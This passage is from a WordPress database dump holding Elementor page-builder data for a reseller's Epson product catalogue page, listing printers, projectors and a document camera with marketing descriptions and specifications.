alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7944,3478,'_elementor_version','2.5.14'),(8664,3664,'_wp_attachment_image_alt','Dell'),(7955,3480,'_elementor_edit_mode','builder'),(7956,3480,'_elementor_template_type','post'),(7957,3480,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in 